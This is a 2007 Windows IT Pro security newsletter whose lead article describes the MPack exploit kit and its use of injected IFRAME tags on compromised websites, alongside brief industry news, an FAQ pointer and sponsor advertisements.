MPack Runs Rampant

MPack Runs Rampant
MPack Runs Rampant

Forwarded with permission from: Security UPDATE 


Risky Business: Managing Risk Through Security 

Keep Unsecured Machines Off Your Network 

Automated GLBA Security Compliance: Free Report 

=== CONTENTS ==================================================
IN FOCUS: MPack Runs Rampant

   - Latest ZLOB Plays on People's Desire for Online Video
   - HP to Provide Web Application Security
   - PatchLink Moves to Unify Protection and Control
   - Recent Security Vulnerabilities

   - Security Matters Blog: Hack the Beta--Win a Game Box
   - FAQ: Preparing AD for Exchange 2007
   - From the Forum: Preventing Power Users from Creating Shares 
   - Share Your Security Tips

   - Continuous Authentication and Encryption
   - Wanted: Your Reviews of Products 




=== SPONSOR: Neverfail ========================================
Risky Business: Managing Risk Through Security 
   Every business faces risk. Have you properly assessed your company's 
risk and put a focus on business continuity? Attend this free Web 
seminar and learn how you can ensure seamless recovery of your key 
systems and keep your users continuously connected. On-demand Web 

=== IN FOCUS: MPack Runs Rampant ============   by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

The need to secure your Web servers has never been higher. In the past, 
many people worried about potential damage to their company's 
reputation should their site be broken into. After all, a defacement 
negatively affects not only a Web site but also a company's public 

But there's another more dangerous aspect to keep in mind: Your site 
might be turned into a vicious attack vector, making you responsible 
for damaging any number of innocent peoples' computers. Anyone with a 
public-facing Web site has a serious responsibility to protect its 
visitors. And if you're hosting other peoples' Web sites, your level of 
responsibility is exponentially higher.

A case in point that clearly demonstrates the need for vigilance is the 
relatively new MPack tool--not to be confused with the compression 
software of the same name.

MPack is an automated, intelligent, server-based attack tool that is 
being used to infect untold numbers of computers. It's basically like 
Metasploit, except that targets are pushed towards MPack en masse. The 
tool is PHP-based and is a flexible attack platform complete with a 
back-end management and monitoring interface. The server components are 
used to deliver exploit payloads to browsers, and people place links to 
an MPack server into Web pages all over the Internet. 

The primary motive of MPack is to generate income through criminal 
activity. Its creators have been selling the tool for about $700 since 
at least December 2006 along with attack modules that evolve as new 
attack types become possible. According to Panda Labs, new modules cost 
anywhere from $50 to $150 depending on the level of exploitation a 
module can carry out.

Recently, intruders using MPack established domains to host Web sites 
to contain links to attack code and broke into numerous Web hosting 
accounts (and quite possibly privately operated Web sites) to include 
attack code in the pages of those unsuspecting, compromised Web sites. 
The attack code typically consists of IFRAME tags that tell a visitor's 
browser to load a malicious Web page inside an existing Web page. The 
browser can be instructed to load a malicious Web page without the user 
having to take any action other than to visit the compromised Web site, 
and the IFRAME can be coded to not even be noticeable on the 
compromised site. So the visitor might remain completely unaware that 
exploitation is taking place.

The malicious Web page contains code that, when run, can determine the 
visitor's OS and browser type and then deliver corresponding exploit 
code. Code exists to exploit Windows, Linux, BSD, and Mac OS systems as 
well as at least seven browsers and various components, such as Apple 
QuickTime, WinZip, and other common tools. MPack can also be made to 
instruct a vulnerable computer to download malicious files. From there, 
a huge range of possibilities opens up.

Panda Labs reports that one Web server recently inspected contains 
7,644 Web pages infected with links to MPack-based exploits. Exactly 
how many sites and pages have been infected remains unknown; however 
one trusted source told me that at least one major hosting company 
(which I won't name) found that its servers were compromised through a 
combination of exploits, and as a result, a large number of index.php 
files were overwritten to contain exploits based on MPack. 

In that incident, I was able to take a look at several of the affected 
sites because I know the operators of those sites. The intruders made a 
puzzling choice to completely overwrite every file that contained the 
string "index" with a simple IFRAME tag to launch exploits. Since all 
the index pages for the affected sites suddenly started showing up 
empty, the break-in became obvious sooner rather than later. 

I have no idea why the intrusion was made so obvious. Had the intruders 
inserted an IFRAME tag into existing HTML instead of overwriting pages 
entirely, the intrusion could have gone undetected for a very long 
time, and the number of infected computers would have risen 

If you're interested in more details about MPack, Panda Labs published 
a detailed analysis of the MPack attack platform, available at the URL 
below in PDF format. 

=== SPONSOR: St. Bernard Software =============================
Keep Unsecured Machines Off Your Network
   Tune into the hottest up-to-date network security protection through 
this exclusive podcast featuring Windows IT Pro editor Karen Forster 
and Microsoft's Ian Hameroff. Learn how Network Access Control (NAC) 
and Network Access Protection (NAP) work and what technologies are 
involved, as well as what third-party products are poised to work with 
these technologies. 

=== SECURITY NEWS AND FEATURES ================================
Latest ZLOB Plays on People's Desire for Online Video
   While ZLOB has been tracked in more than 1,000 renditions since late 
2005, several security firms reported that the latest ZLOB outbreak 
takes social engineering to a new extreme to lure people into its trap. 

HP to Provide Web Application Security
   HP will acquire SPI Dynamics, maker and provider of Web application 
security assessment software and services. 

PatchLink Moves to Unify Protection and Control
   PatchLink will acquire SecureWave, thereby taking another step 
towards unified protection and control. 

Recent Security Vulnerabilities
   If you subscribe to this newsletter, you also receive Security 
Alerts, which inform you about recently discovered security 
vulnerabilities. You can also find information about these 
discoveries at 

=== SPONSOR: Qualys ===========================================
Automated GLBA Security Compliance: Free Report 
   Compliance and knowledge of every aspect of the GLBA is mandatory. 
Through web services, on demand security is automated and immediate 
compliance to the GLBA safeguard guidelines is achieved. Learn how 
comprehensive GLBA compliance is managed through internal and external 

=== GIVE AND TAKE =============================================
SECURITY MATTERS BLOG: Hack the Beta--Win a Game Box
by Mark Joseph Edwards, 

Here's an opportunity to put a beta security product through the 
wringer and possibly win one of several game boxes in the process. 

FAQ: Preparing AD for Exchange 2007
by John Savill, 

Q: How do I manually prepare my AD forest and domain for Exchange 
Server 2007?

Find the answer at 

FROM THE FORUM: Preventing Power Users from Creating Shares
   A forum participant wants to disallow power users from creating or 
modifying shares. He's looked through Group Policy Objects (GPOs) and 
can't find a way to remove the Shares snap-in under Computer Management 
or just lock it out. If prevention isn't possible, is there a way to 
turn on auditing for share creation? To join the discussion, go to 

   Share your security-related tips, comments, or problems and 
solutions in Security Pro VIP's Reader to Reader column. Email your 
contributions to If we print your submission, 
you'll get $100. We edit submissions for style, grammar, and length.

=== PRODUCTS ================================================== by Renee Munshi, 

Continuous Authentication and Encryption
   2factor announced Real Privacy Management (RPM), a two-factor 
private-key software solution that can be deployed standalone or inside 
a software application, device, or chip. RPM continuously generates new 
256-bit secret keys that are used to mutually authenticate each party 
and to encrypt/decrypt every data transmission in real time. 2factor 
also announced SecureWeb, a small auto-loading applet that invokes a 
secure instance of the user's default browser. SecureWeb runs RPM to 
authenticate and encrypt sensitive transactions. For more information, 
go to 

WANTED: your reviews of products you've tested and used in 
production. Send your experiences and ratings of products to and get a Best Buy gift certificate. 

=== RESOURCES AND EVENTS ======================================   For more security-related resources, visit 

Black Hat USA 2007, July 28-August 2 in Las Vegas, is the world's 
premier technical event for ICT security experts. Choose from 30 hands-
on training courses and 90 briefings presentations with lots of new 
content and new tools. Network with 4,000 delegates from 70 nations. 
Visit product displays by 30 top sponsors in a relaxed setting. 

Improve the security of Linux and UNIX computers by letting them 
authenticate and authorize users through Microsoft Active Directory. 
This white paper shows how you can lower costs, improve security, 
simplify user account management, and demonstrate compliance with 
regulatory requirements. 

Gain control over the growing amount of file data in your enterprise. 
Learn how file area networks can help you centralize file 
consolidation, migration, replication, and failover. Download this 
eBook and start streamlining your file management projects today! 

=== FEATURED WHITE PAPER ======================================
One of the main concerns in the IT industry today is security. This 
white paper, written by Microsoft MVP for Terminal Services Claudio 
Rodrigues, takes a deep look at security concerns, the available 
solutions, their drawbacks, and a new complementary way of addressing 
today's security issues. 

=== ANNOUNCEMENTS =============================================
Introducing a Unique Exchange and Outlook Resource 
   Exchange & Outlook Pro VIP is an online information center that 
delivers new articles every week on messaging topics such as 
administration, migration, security, and performance. Subscribers also 
receive tips, cautionary advice, direct access to our editors, and a 
host of other benefits. Order now at an exclusive charter rate and save 
up to $50! 

Special Invitation for VIP Access 
   Become a VIP subscriber and get continuous inside access to all the 
content published in Windows IT Pro, SQL Server Magazine, Exchange & 
Outlook Pro VIP, Scripting Pro VIP, and Security Pro VIP. Subscribe 

Security UDPATE is brought to you by the Windows IT Pro Web site's 
Security page (first URL below) and Security Pro VIP (second URL 

Subscribe to Security UPDATE at 

Be sure to add 
to your antispam software's list of allowed senders.

To contact us: 
About Security UPDATE content -- 
About technical questions -- 
About your product news -- 
About your subscription -- 
About sponsoring Security UPDATE -- 

View the Windows IT Pro privacy policy at 

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.

Attend Black Hat USA, July 28-August 2 in Las Vegas, 
the world's premier technical event for ICT security 
experts. Featuring 30 hands-on training courses and 
90 Briefings presentations with lots of new content 
and new tools. Network with 4,000 delegates from 
70 nations.   Visit product displays by 30 top
sponsors in a relaxed setting. Rates increase on 
June 1 so register today. 

Site design & layout copyright © 1986-2015 CodeGods